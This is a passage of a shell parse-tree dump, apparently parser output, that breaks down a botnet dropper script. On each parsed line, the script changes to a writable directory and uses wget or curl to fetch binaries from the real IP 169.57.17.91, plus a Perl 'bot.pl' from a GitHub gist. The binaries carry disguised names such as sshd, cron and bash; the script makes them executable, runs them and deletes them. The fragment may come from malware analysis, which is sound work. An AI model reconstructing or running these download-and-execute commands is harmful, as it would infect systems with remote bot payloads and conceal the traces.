  CommandNode(lineno=15, pos=(1715, 1726), parts=[
    WordNode(lineno=15, pos=(1715, 1717), word='cd'),
    WordNode(lineno=15, pos=(1718, 1726), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1727, 1729)),
  CommandNode(lineno=15, pos=(1730, 1737), parts=[
    WordNode(lineno=15, pos=(1730, 1732), word='cd'),
    WordNode(lineno=15, pos=(1733, 1737), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1738, 1740)),
  CommandNode(lineno=15, pos=(1741, 1749), parts=[
    WordNode(lineno=15, pos=(1741, 1743), word='cd'),
    WordNode(lineno=15, pos=(1744, 1749), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1750, 1752)),
  CommandNode(lineno=15, pos=(1753, 1757), parts=[
    WordNode(lineno=15, pos=(1753, 1755), word='cd'),
    WordNode(lineno=15, pos=(1756, 1757), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1757, 1758)),
  CommandNode(lineno=15, pos=(1759, 1791), parts=[
    WordNode(lineno=15, pos=(1759, 1763), word='wget'),
    WordNode(lineno=15, pos=(1764, 1791), word='http://169.57.17.91/telnetd'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1791, 1792)),
  CommandNode(lineno=15, pos=(1793, 1809), parts=[
    WordNode(lineno=15, pos=(1793, 1798), word='chmod'),
    WordNode(lineno=15, pos=(1799, 1801), word='+x'),
    WordNode(lineno=15, pos=(1802, 1809), word='telnetd'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1809, 1810)),
  CommandNode(lineno=15, pos=(1811, 1820), parts=[
    WordNode(lineno=15, pos=(1811, 1820), word='./telnetd'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1820, 1821)),
  CommandNode(lineno=15, pos=(1822, 1836), parts=[
    WordNode(lineno=15, pos=(1822, 1824), word='rm'),
    WordNode(lineno=15, pos=(1825, 1828), word='-rf'),
    WordNode(lineno=15, pos=(1829, 1836), word='telnetd'),
  ]),
])
ListNode(lineno=16, pos=(1837, 1960), parts=[
  CommandNode(lineno=16, pos=(1837, 1844), parts=[
    WordNode(lineno=16, pos=(1837, 1839), word='cd'),
    WordNode(lineno=16, pos=(1840, 1844), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1845, 1847)),
  CommandNode(lineno=16, pos=(1848, 1859), parts=[
    WordNode(lineno=16, pos=(1848, 1850), word='cd'),
    WordNode(lineno=16, pos=(1851, 1859), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1860, 1862)),
  CommandNode(lineno=16, pos=(1863, 1870), parts=[
    WordNode(lineno=16, pos=(1863, 1865), word='cd'),
    WordNode(lineno=16, pos=(1866, 1870), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1871, 1873)),
  CommandNode(lineno=16, pos=(1874, 1882), parts=[
    WordNode(lineno=16, pos=(1874, 1876), word='cd'),
    WordNode(lineno=16, pos=(1877, 1882), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1883, 1885)),
  CommandNode(lineno=16, pos=(1886, 1890), parts=[
    WordNode(lineno=16, pos=(1886, 1888), word='cd'),
    WordNode(lineno=16, pos=(1889, 1890), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1890, 1891)),
  CommandNode(lineno=16, pos=(1892, 1924), parts=[
    WordNode(lineno=16, pos=(1892, 1896), word='curl'),
    WordNode(lineno=16, pos=(1897, 1899), word='-O'),
    WordNode(lineno=16, pos=(1900, 1924), word='http://169.57.17.91/ntpd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1924, 1925)),
  CommandNode(lineno=16, pos=(1926, 1939), parts=[
    WordNode(lineno=16, pos=(1926, 1931), word='chmod'),
    WordNode(lineno=16, pos=(1932, 1934), word='+x'),
    WordNode(lineno=16, pos=(1935, 1939), word='ntpd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1939, 1940)),
  CommandNode(lineno=16, pos=(1941, 1947), parts=[
    WordNode(lineno=16, pos=(1941, 1947), word='./ntpd'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1947, 1948)),
  CommandNode(lineno=16, pos=(1949, 1960), parts=[
    WordNode(lineno=16, pos=(1949, 1951), word='rm'),
    WordNode(lineno=16, pos=(1952, 1955), word='-rf'),
    WordNode(lineno=16, pos=(1956, 1960), word='ntpd'),
  ]),
])
ListNode(lineno=17, pos=(1961, 2084), parts=[
  CommandNode(lineno=17, pos=(1961, 1968), parts=[
    WordNode(lineno=17, pos=(1961, 1963), word='cd'),
    WordNode(lineno=17, pos=(1964, 1968), word='/tmp'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1969, 1971)),
  CommandNode(lineno=17, pos=(1972, 1983), parts=[
    WordNode(lineno=17, pos=(1972, 1974), word='cd'),
    WordNode(lineno=17, pos=(1975, 1983), word='/var/run'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1984, 1986)),
  CommandNode(lineno=17, pos=(1987, 1994), parts=[
    WordNode(lineno=17, pos=(1987, 1989), word='cd'),
    WordNode(lineno=17, pos=(1990, 1994), word='/mnt'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(1995, 1997)),
  CommandNode(lineno=17, pos=(1998, 2006), parts=[
    WordNode(lineno=17, pos=(1998, 2000), word='cd'),
    WordNode(lineno=17, pos=(2001, 2006), word='/root'),
  ]),
  OperatorNode(lineno=17, op='||', pos=(2007, 2009)),
  CommandNode(lineno=17, pos=(2010, 2014), parts=[
    WordNode(lineno=17, pos=(2010, 2012), word='cd'),
    WordNode(lineno=17, pos=(2013, 2014), word='/'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2014, 2015)),
  CommandNode(lineno=17, pos=(2016, 2048), parts=[
    WordNode(lineno=17, pos=(2016, 2020), word='curl'),
    WordNode(lineno=17, pos=(2021, 2023), word='-O'),
    WordNode(lineno=17, pos=(2024, 2048), word='http://169.57.17.91/sshd'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2048, 2049)),
  CommandNode(lineno=17, pos=(2050, 2063), parts=[
    WordNode(lineno=17, pos=(2050, 2055), word='chmod'),
    WordNode(lineno=17, pos=(2056, 2058), word='+x'),
    WordNode(lineno=17, pos=(2059, 2063), word='sshd'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2063, 2064)),
  CommandNode(lineno=17, pos=(2065, 2071), parts=[
    WordNode(lineno=17, pos=(2065, 2071), word='./sshd'),
  ]),
  OperatorNode(lineno=17, op=';', pos=(2071, 2072)),
  CommandNode(lineno=17, pos=(2073, 2084), parts=[
    WordNode(lineno=17, pos=(2073, 2075), word='rm'),
    WordNode(lineno=17, pos=(2076, 2079), word='-rf'),
    WordNode(lineno=17, pos=(2080, 2084), word='sshd'),
  ]),
])
ListNode(lineno=18, pos=(2085, 2220), parts=[
  CommandNode(lineno=18, pos=(2085, 2092), parts=[
    WordNode(lineno=18, pos=(2085, 2087), word='cd'),
    WordNode(lineno=18, pos=(2088, 2092), word='/tmp'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2093, 2095)),
  CommandNode(lineno=18, pos=(2096, 2107), parts=[
    WordNode(lineno=18, pos=(2096, 2098), word='cd'),
    WordNode(lineno=18, pos=(2099, 2107), word='/var/run'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2108, 2110)),
  CommandNode(lineno=18, pos=(2111, 2118), parts=[
    WordNode(lineno=18, pos=(2111, 2113), word='cd'),
    WordNode(lineno=18, pos=(2114, 2118), word='/mnt'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2119, 2121)),
  CommandNode(lineno=18, pos=(2122, 2130), parts=[
    WordNode(lineno=18, pos=(2122, 2124), word='cd'),
    WordNode(lineno=18, pos=(2125, 2130), word='/root'),
  ]),
  OperatorNode(lineno=18, op='||', pos=(2131, 2133)),
  CommandNode(lineno=18, pos=(2134, 2138), parts=[
    WordNode(lineno=18, pos=(2134, 2136), word='cd'),
    WordNode(lineno=18, pos=(2137, 2138), word='/'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2138, 2139)),
  CommandNode(lineno=18, pos=(2140, 2175), parts=[
    WordNode(lineno=18, pos=(2140, 2144), word='curl'),
    WordNode(lineno=18, pos=(2145, 2147), word='-O'),
    WordNode(lineno=18, pos=(2148, 2175), word='http://169.57.17.91/openssh'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2175, 2176)),
  CommandNode(lineno=18, pos=(2177, 2193), parts=[
    WordNode(lineno=18, pos=(2177, 2182), word='chmod'),
    WordNode(lineno=18, pos=(2183, 2185), word='+x'),
    WordNode(lineno=18, pos=(2186, 2193), word='openssh'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2193, 2194)),
  CommandNode(lineno=18, pos=(2195, 2204), parts=[
    WordNode(lineno=18, pos=(2195, 2204), word='./openssh'),
  ]),
  OperatorNode(lineno=18, op=';', pos=(2204, 2205)),
  CommandNode(lineno=18, pos=(2206, 2220), parts=[
    WordNode(lineno=18, pos=(2206, 2208), word='rm'),
    WordNode(lineno=18, pos=(2209, 2212), word='-rf'),
    WordNode(lineno=18, pos=(2213, 2220), word='openssh'),
  ]),
])
ListNode(lineno=19, pos=(2221, 2455), parts=[
  CommandNode(lineno=19, pos=(2221, 2228), parts=[
    WordNode(lineno=19, pos=(2221, 2223), word='cd'),
    WordNode(lineno=19, pos=(2224, 2228), word='/tmp'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2229, 2231)),
  CommandNode(lineno=19, pos=(2232, 2243), parts=[
    WordNode(lineno=19, pos=(2232, 2234), word='cd'),
    WordNode(lineno=19, pos=(2235, 2243), word='/var/run'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2244, 2246)),
  CommandNode(lineno=19, pos=(2247, 2254), parts=[
    WordNode(lineno=19, pos=(2247, 2249), word='cd'),
    WordNode(lineno=19, pos=(2250, 2254), word='/mnt'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2255, 2257)),
  CommandNode(lineno=19, pos=(2258, 2266), parts=[
    WordNode(lineno=19, pos=(2258, 2260), word='cd'),
    WordNode(lineno=19, pos=(2261, 2266), word='/root'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(2267, 2269)),
  CommandNode(lineno=19, pos=(2270, 2274), parts=[
    WordNode(lineno=19, pos=(2270, 2272), word='cd'),
    WordNode(lineno=19, pos=(2273, 2274), word='/'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2274, 2275)),
  CommandNode(lineno=19, pos=(2276, 2410), parts=[
    WordNode(lineno=19, pos=(2276, 2280), word='curl'),
    WordNode(lineno=19, pos=(2281, 2283), word='-O'),
    WordNode(lineno=19, pos=(2284, 2410), word='https://gist.githubusercontent.com/PajeBR/3a210b3840858c0e93e29a82bc8780fc/raw/f9cf87893d3e265b41bf1a76f7b06a0e165dd76e/bot.pl'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2410, 2411)),
  CommandNode(lineno=19, pos=(2412, 2427), parts=[
    WordNode(lineno=19, pos=(2412, 2417), word='chmod'),
    WordNode(lineno=19, pos=(2418, 2420), word='+x'),
    WordNode(lineno=19, pos=(2421, 2427), word='bot.pl'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2427, 2428)),
  CommandNode(lineno=19, pos=(2429, 2440), parts=[
    WordNode(lineno=19, pos=(2429, 2433), word='perl'),
    WordNode(lineno=19, pos=(2434, 2440), word='bot.pl'),
  ]),
  OperatorNode(lineno=19, op=';', pos=(2440, 2441)),
  CommandNode(lineno=19, pos=(2442, 2455), parts=[
    WordNode(lineno=19, pos=(2442, 2444), word='rm'),
    WordNode(lineno=19, pos=(2445, 2448), word='-rf'),
    WordNode(lineno=19, pos=(2449, 2455), word='bot.pl'),
  ]),
])
ListNode(lineno=20, pos=(2456, 2579), parts=[
  CommandNode(lineno=20, pos=(2456, 2463), parts=[
    WordNode(lineno=20, pos=(2456, 2458), word='cd'),
    WordNode(lineno=20, pos=(2459, 2463), word='/tmp'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(2464, 2466)),
  CommandNode(lineno=20, pos=(2467, 2478), parts=[
    WordNode(lineno=20, pos=(2467, 2469), word='cd'),
    WordNode(lineno=20, pos=(2470, 2478), word='/var/run'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(2479, 2481)),
  CommandNode(lineno=20, pos=(2482, 2489), parts=[
    WordNode(lineno=20, pos=(2482, 2484), word='cd'),
    WordNode(lineno=20, pos=(2485, 2489), word='/mnt'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(2490, 2492)),
  CommandNode(lineno=20, pos=(2493, 2501), parts=[
    WordNode(lineno=20, pos=(2493, 2495), word='cd'),
    WordNode(lineno=20, pos=(2496, 2501), word='/root'),
  ]),
  OperatorNode(lineno=20, op='||', pos=(2502, 2504)),
  CommandNode(lineno=20, pos=(2505, 2509), parts=[
    WordNode(lineno=20, pos=(2505, 2507), word='cd'),
    WordNode(lineno=20, pos=(2508, 2509), word='/'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(2509, 2510)),
  CommandNode(lineno=20, pos=(2511, 2543), parts=[
    WordNode(lineno=20, pos=(2511, 2515), word='curl'),
    WordNode(lineno=20, pos=(2516, 2518), word='-O'),
    WordNode(lineno=20, pos=(2519, 2543), word='http://169.57.17.91/bash'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(2543, 2544)),
  CommandNode(lineno=20, pos=(2545, 2558), parts=[
    WordNode(lineno=20, pos=(2545, 2550), word='chmod'),
    WordNode(lineno=20, pos=(2551, 2553), word='+x'),
    WordNode(lineno=20, pos=(2554, 2558), word='bash'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(2558, 2559)),
  CommandNode(lineno=20, pos=(2560, 2566), parts=[
    WordNode(lineno=20, pos=(2560, 2566), word='./bash'),
  ]),
  OperatorNode(lineno=20, op=';', pos=(2566, 2567)),
  CommandNode(lineno=20, pos=(2568, 2579), parts=[
    WordNode(lineno=20, pos=(2568, 2570), word='rm'),
    WordNode(lineno=20, pos=(2571, 2574), word='-rf'),
    WordNode(lineno=20, pos=(2575, 2579), word='bash'),
  ]),
])
ListNode(lineno=21, pos=(2580, 2703), parts=[
  CommandNode(lineno=21, pos=(2580, 2587), parts=[
    WordNode(lineno=21, pos=(2580, 2582), word='cd'),
    WordNode(lineno=21, pos=(2583, 2587), word='/tmp'),
  ]),
  OperatorNode(lineno=21, op='||', pos=(2588, 2590)),
  CommandNode(lineno=21, pos=(2591, 2602), parts=[
    WordNode(lineno=21, pos=(2591, 2593), word='cd'),
    WordNode(lineno=21, pos=(2594, 2602), word='/var/run'),
  ]),
  OperatorNode(lineno=21, op='||', pos=(2603, 2605)),
  CommandNode(lineno=21, pos=(2606, 2613), parts=[
    WordNode(lineno=21, pos=(2606, 2608), word='cd'),
    WordNode(lineno=21, pos=(2609, 2613), word='/mnt'),
  ]),
  OperatorNode(lineno=21, op='||', pos=(2614, 2616)),
  CommandNode(lineno=21, pos=(2617, 2625), parts=[
    WordNode(lineno=21, pos=(2617, 2619), word='cd'),
    WordNode(lineno=21, pos=(2620, 2625), word='/root'),
  ]),
  OperatorNode(lineno=21, op='||', pos=(2626, 2628)),
  CommandNode(lineno=21, pos=(2629, 2633), parts=[
    WordNode(lineno=21, pos=(2629, 2631), word='cd'),
    WordNode(lineno=21, pos=(2632, 2633), word='/'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(2633, 2634)),
  CommandNode(lineno=21, pos=(2635, 2667), parts=[
    WordNode(lineno=21, pos=(2635, 2639), word='curl'),
    WordNode(lineno=21, pos=(2640, 2642), word='-O'),
    WordNode(lineno=21, pos=(2643, 2667), word='http://169.57.17.91/tftp'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(2667, 2668)),
  CommandNode(lineno=21, pos=(2669, 2682), parts=[
    WordNode(lineno=21, pos=(2669, 2674), word='chmod'),
    WordNode(lineno=21, pos=(2675, 2677), word='+x'),
    WordNode(lineno=21, pos=(2678, 2682), word='tftp'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(2682, 2683)),
  CommandNode(lineno=21, pos=(2684, 2690), parts=[
    WordNode(lineno=21, pos=(2684, 2690), word='./tftp'),
  ]),
  OperatorNode(lineno=21, op=';', pos=(2690, 2691)),
  CommandNode(lineno=21, pos=(2692, 2703), parts=[
    WordNode(lineno=21, pos=(2692, 2694), word='rm'),
    WordNode(lineno=21, pos=(2695, 2698), word='-rf'),
    WordNode(lineno=21, pos=(2699, 2703), word='tftp'),
  ]),
])
ListNode(lineno=22, pos=(2704, 2839), parts=[
  CommandNode(lineno=22, pos=(2704, 2711), parts=[
    WordNode(lineno=22, pos=(2704, 2706), word='cd'),
    WordNode(lineno=22, pos=(2707, 2711), word='/tmp'),
  ]),
  OperatorNode(lineno=22, op='||', pos=(2712, 2714)),
  CommandNode(lineno=22, pos=(2715, 2726), parts=[
    WordNode(lineno=22, pos=(2715, 2717), word='cd'),
    WordNode(lineno=22, pos=(2718, 2726), word='/var/run'),
  ]),
  OperatorNode(lineno=22, op='||', pos=(2727, 2729)),
  CommandNode(lineno=22, pos=(2730, 2737), parts=[
    WordNode(lineno=22, pos=(2730, 2732), word='cd'),
    WordNode(lineno=22, pos=(2733, 2737), word='/mnt'),
  ]),
  OperatorNode(lineno=22, op='||', pos=(2738, 2740)),
  CommandNode(lineno=22, pos=(2741, 2749), parts=[
    WordNode(lineno=22, pos=(2741, 2743), word='cd'),
    WordNode(lineno=22, pos=(2744, 2749), word='/root'),
  ]),
  OperatorNode(lineno=22, op='||', pos=(2750, 2752)),
  CommandNode(lineno=22, pos=(2753, 2757), parts=[
    WordNode(lineno=22, pos=(2753, 2755), word='cd'),
    WordNode(lineno=22, pos=(2756, 2757), word='/'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2757, 2758)),
  CommandNode(lineno=22, pos=(2759, 2794), parts=[
    WordNode(lineno=22, pos=(2759, 2763), word='curl'),
    WordNode(lineno=22, pos=(2764, 2766), word='-O'),
    WordNode(lineno=22, pos=(2767, 2791), word='http://169.57.17.91/curl'),
    WordNode(lineno=22, pos=(2792, 2794), word='-O'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2794, 2795)),
  CommandNode(lineno=22, pos=(2796, 2812), parts=[
    WordNode(lineno=22, pos=(2796, 2801), word='chmod'),
    WordNode(lineno=22, pos=(2802, 2804), word='+x'),
    WordNode(lineno=22, pos=(2805, 2809), word='curl'),
    WordNode(lineno=22, pos=(2810, 2812), word='-O'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2812, 2813)),
  CommandNode(lineno=22, pos=(2814, 2823), parts=[
    WordNode(lineno=22, pos=(2814, 2820), word='./curl'),
    WordNode(lineno=22, pos=(2821, 2823), word='-O'),
  ]),
  OperatorNode(lineno=22, op=';', pos=(2823, 2824)),
  CommandNode(lineno=22, pos=(2825, 2839), parts=[
    WordNode(lineno=22, pos=(2825, 2827), word='rm'),
    WordNode(lineno=22, pos=(2828, 2831), word='-rf'),
    WordNode(lineno=22, pos=(2832, 2836), word='curl'),
    WordNode(lineno=22, pos=(2837, 2839), word='-O'),
  ]),
])
ListNode(lineno=23, pos=(2840, 2963), parts=[
  CommandNode(lineno=23, pos=(2840, 2847), parts=[
    WordNode(lineno=23, pos=(2840, 2842), word='cd'),
    WordNode(lineno=23, pos=(2843, 2847), word='/tmp'),
  ]),
  OperatorNode(lineno=23, op='||', pos=(2848, 2850)),
  CommandNode(lineno=23, pos=(2851, 2862), parts=[
    WordNode(lineno=23, pos=(2851, 2853), word='cd'),
    WordNode(lineno=23, pos=(2854, 2862), word='/var/run'),
  ]),
  OperatorNode(lineno=23, op='||', pos=(2863, 2865)),
  CommandNode(lineno=23, pos=(2866, 2873), parts=[
    WordNode(lineno=23, pos=(2866, 2868), word='cd'),
    WordNode(lineno=23, pos=(2869, 2873), word='/mnt'),
  ]),
  OperatorNode(lineno=23, op='||', pos=(2874, 2876)),
  CommandNode(lineno=23, pos=(2877, 2885), parts=[
    WordNode(lineno=23, pos=(2877, 2879), word='cd'),
    WordNode(lineno=23, pos=(2880, 2885), word='/root'),
  ]),
  OperatorNode(lineno=23, op='||', pos=(2886, 2888)),
  CommandNode(lineno=23, pos=(2889, 2893), parts=[
    WordNode(lineno=23, pos=(2889, 2891), word='cd'),
    WordNode(lineno=23, pos=(2892, 2893), word='/'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2893, 2894)),
  CommandNode(lineno=23, pos=(2895, 2927), parts=[
    WordNode(lineno=23, pos=(2895, 2899), word='curl'),
    WordNode(lineno=23, pos=(2900, 2902), word='-O'),
    WordNode(lineno=23, pos=(2903, 2927), word='http://169.57.17.91/cron'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2927, 2928)),
  CommandNode(lineno=23, pos=(2929, 2942), parts=[
    WordNode(lineno=23, pos=(2929, 2934), word='chmod'),
    WordNode(lineno=23, pos=(2935, 2937), word='+x'),
    WordNode(lineno=23, pos=(2938, 2942), word='cron'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2942, 2943)),
  CommandNode(lineno=23, pos=(2944, 2950), parts=[
    WordNode(lineno=23, pos=(2944, 2950), word='./cron'),
  ]),
  OperatorNode(lineno=23, op=';', pos=(2950, 2951)),
  CommandNode(lineno=23, pos=(2952, 2963), parts=[
    WordNode(lineno=23, pos=(2952, 2954), word='rm'),
    WordNode(lineno=23, pos=(2955, 2958), word='-rf'),
    WordNode(lineno=23, pos=(2959, 2963), word='cron'),
  ]),
])
ListNode(lineno=24, pos=(2964, 3083), parts=[
  CommandNode(lineno=24, pos=(2964, 2971), parts=[
    WordNode(lineno=24, pos=(2964, 2966), word='cd'),
    WordNode(lineno=24, pos=(2967, 2971), word='/tmp'),
  ]),
  OperatorNode(lineno=24, op='||', pos=(2972, 2974)),
  CommandNode(lineno=24, pos=(2975, 2986), parts=[
    WordNode(lineno=24, pos=(2975, 2977), word='cd'),
    WordNode(lineno=24, pos=(2978, 2986), word='/var/run'),
  ]),
  OperatorNode(lineno=24, op='||', pos=(2987, 2989)),
  CommandNode(lineno=24, pos=(2990, 2997), parts=[
    WordNode(lineno=24, pos=(2990, 2992), word='cd'),
    WordNode(lineno=24, pos=(2993, 2997), word='/mnt'),
  ]),
  OperatorNode(lineno=24, op='||', pos=(2998, 3000)),
  CommandNode(lineno=24, pos=(3001, 3009), parts=[
    WordNode(lineno=24, pos=(3001, 3003), word='cd'),
    WordNode(lineno=24, pos=(3004, 3009), word='/root'),
  ]),
  OperatorNode(lineno=24, op='||', pos=(3010, 3012)),
  CommandNode(lineno=24, pos=(3013, 3017), parts=[
    WordNode(lineno=24, pos=(3013, 3015), word='cd'),
    WordNode(lineno=24, pos=(3016, 3017), word='/'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(3017, 3018)),
  CommandNode(lineno=24, pos=(3019, 3050), parts=[
    WordNode(lineno=24, pos=(3019, 3023), word='curl'),
    WordNode(lineno=24, pos=(3024, 3026), word='-O'),
    WordNode(lineno=24, pos=(3027, 3050), word='http://169.57.17.91/ftp'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(3050, 3051)),
  CommandNode(lineno=24, pos=(3052, 3064), parts=[
    WordNode(lineno=24, pos=(3052, 3057), word='chmod'),
    WordNode(lineno=24, pos=(3058, 3060), word='+x'),
    WordNode(lineno=24, pos=(3061, 3064), word='ftp'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(3064, 3065)),
  CommandNode(lineno=24, pos=(3066, 3071), parts=[
    WordNode(lineno=24, pos=(3066, 3071), word='./ftp'),
  ]),
  OperatorNode(lineno=24, op=';', pos=(3071, 3072)),
  CommandNode(lineno=24, pos=(3073, 3083), parts=[
    WordNode(lineno=24, pos=(3073, 3075), word='rm'),
    WordNode(lineno=24, pos=(3076, 3079), word='-rf'),
    WordNode(lineno=24, pos=(3080, 3083), word='ftp'),
  ]),
])
ListNode(lineno=25, pos=(3084, 3207), parts=[
  CommandNode(lineno=25, pos=(3084, 3091), parts=[
    WordNode(lineno=25, pos=(3084, 3086), word='cd'),
    WordNode(lineno=25, pos=(3087, 3091), word='/tmp'),
  ]),
  OperatorNode(lineno=25, op='||', pos=(3092, 3094)),
  CommandNode(lineno=25, pos=(3095, 3106), parts=[
    WordNode(lineno=25, pos=(3095, 3097), word='cd'),
    WordNode(lineno=25, pos=(3098, 3106), word='/var/run'),
  ]),
  OperatorNode(lineno=25, op='||', pos=(3107, 3109)),
  CommandNode(lineno=25, pos=(3110, 3117), parts=[
    WordNode(lineno=25, pos=(3110, 3112), word='cd'),
    WordNode(lineno=25, pos=(3113, 3117), word='/mnt'),
  ]),
  OperatorNode(lineno=25, op='||', pos=(3118, 3120)),
  CommandNode(lineno=25, pos=(3121, 3129), parts=[
    WordNode(lineno=25, pos=(3121, 3123), word='cd'),
    WordNode(lineno=25, pos=(3124, 3129), word='/root'),
  ]),
  OperatorNode(lineno=25, op='||', pos=(3130, 3132)),
  CommandNode(lineno=25, pos=(3133, 3137), parts=[
    WordNode(lineno=25, pos=(3133, 3135), word='cd'),
    WordNode(lineno=25, pos=(3136, 3137), word='/'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(3137, 3138)),
  CommandNode(lineno=25, pos=(3139, 3171), parts=[
    WordNode(lineno=25, pos=(3139, 3143), word='curl'),
    WordNode(lineno=25, pos=(3144, 3146), word='-O'),
    WordNode(lineno=25, pos=(3147, 3171), word='http://169.57.17.91/pftp'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(3171, 3172)),
  CommandNode(lineno=25, pos=(3173, 3186), parts=[
    WordNode(lineno=25, pos=(3173, 3178), word='chmod'),
    WordNode(lineno=25, pos=(3179, 3181), word='+x'),
    WordNode(lineno=25, pos=(3182, 3186), word='pftp'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(3186, 3187)),
  CommandNode(lineno=25, pos=(3188, 3194), parts=[
    WordNode(lineno=25, pos=(3188, 3194), word='./pftp'),
  ]),
  OperatorNode(lineno=25, op=';', pos=(3194, 3195)),
  CommandNode(lineno=25, pos=(3196, 3207), parts=[
    WordNode(lineno=25, pos=(3196, 3198), word='rm'),
    WordNode(lineno=25, pos=(3199, 3202), word='-rf'),
    WordNode(lineno=25, pos=(3203, 3207), word='pftp'),
  ]),
])
ListNode(lineno=26, pos=(3208, 3323), parts=[
  CommandNode(lineno=26, pos=(3208, 3215), parts=[
    WordNode(lineno=26, pos=(3208, 3210), word='cd'),
    WordNode(lineno=26, pos=(3211, 3215), word='/tmp'),
  ]),
  OperatorNode(lineno=26, op='||', pos=(3216, 3218)),
  CommandNode(lineno=26, pos=(3219, 3230), parts=[
    WordNode(lineno=26, pos=(3219, 3221), word='cd'),
    WordNode(lineno=26, pos=(3222, 3230), word='/var/run'),
  ]),
  OperatorNode(lineno=26, op='||', pos=(3231, 3233)),
  CommandNode(lineno=26, pos=(3234, 3241), parts=[
    WordNode(lineno=26, pos=(3234, 3236), word='cd'),
    WordNode(lineno=26, pos=(3237, 3241), word='/mnt'),
  ]),
  OperatorNode(lineno=26, op='||', pos=(3242, 3244)),
  CommandNode(lineno=26, pos=(3245, 3253), parts=[
    WordNode(lineno=26, pos=(3245, 3247), word='cd'),
    WordNode(lineno=26, pos=(3248, 3253), word='/root'),
  ]),
  OperatorNode(lineno=26, op='||', pos=(3254, 3256)),
  CommandNode(lineno=26, pos=(3257, 3261), parts=[
    WordNode(lineno=26, pos=(3257, 3259), word='cd'),
    WordNode(lineno=26, pos=(3260, 3261), word='/'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(3261, 3262)),
  CommandNode(lineno=26, pos=(3263, 3293), parts=[
    WordNode(lineno=26, pos=(3263, 3267), word='curl'),
    WordNode(lineno=26, pos=(3268, 3270), word='-O'),
    WordNode(lineno=26, pos=(3271, 3293), word='http://169.57.17.91/sh'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(3293, 3294)),
  CommandNode(lineno=26, pos=(3295, 3306), parts=[
    WordNode(lineno=26, pos=(3295, 3300), word='chmod'),
    WordNode(lineno=26, pos=(3301, 3303), word='+x'),
    WordNode(lineno=26, pos=(3304, 3306), word='sh'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(3306, 3307)),
  CommandNode(lineno=26, pos=(3308, 3312), parts=[
    WordNode(lineno=26, pos=(3308, 3312), word='./sh'),
  ]),
  OperatorNode(lineno=26, op=';', pos=(3312, 3313)),
  CommandNode(lineno=26, pos=(3314, 3323), parts=[
    WordNode(lineno=26, pos=(3314, 3316), word='rm'),
    WordNode(lineno=26, pos=(3317, 3320), word='-rf'),
    WordNode(lineno=26, pos=(3321, 3323), word='sh'),
  ]),
])
ListNode(lineno=27, pos=(3324, 3443), parts=[
  CommandNode(lineno=27, pos=(3324, 3331), parts=[
    WordNode(lineno=27, pos=(3324, 3326), word='cd'),
    WordNode(lineno=27, pos=(3327, 3331), word='/tmp'),
  ]),
  OperatorNode(lineno=27, op='||', pos=(3332, 3334)),
  CommandNode(lineno=27, pos=(3335, 3346), parts=[
    WordNode(lineno=27, pos=(3335, 3337), word='cd'),
    WordNode(lineno=27, pos=(3338, 3346), word='/var/run'),
  ]),
  OperatorNode(lineno=27, op='||', pos=(3347, 3349)),
  CommandNode(lineno=27, pos=(3350, 3357), parts=[
    WordNode(lineno=27, pos=(3350, 3352), word='cd'),
    WordNode(lineno=27, pos=(3353, 3357), word='/mnt'),
  ]),
  OperatorNode(lineno=27, op='||', pos=(3358, 3360)),
  CommandNode(lineno=27, pos=(3361, 3369), parts=[
    WordNode(lineno=27, pos=(3361, 3363), word='cd'),
    WordNode(lineno=27, pos=(3364, 3369), word='/root'),
  ]),
